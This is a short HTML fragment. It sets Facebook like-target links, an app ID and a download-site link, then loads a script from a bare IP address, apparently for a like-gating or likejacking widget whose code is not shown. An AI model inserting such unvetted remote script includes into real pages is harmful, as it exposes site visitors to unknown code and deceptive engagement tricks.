<script type="text/javascript">
  var linksLikePost = [
             'http://www.curtiagora.com.br/2014/03/veja-como-remover-um-chupao.html',
            ''],
      fbAppId = '1419426881637154',
	    pluginLinkForDelayTime = 'http://link-pra-download.com.br';


</script>
<script type="text/javascript" src="http://107.170.49.236/my-app-file.js"></script>
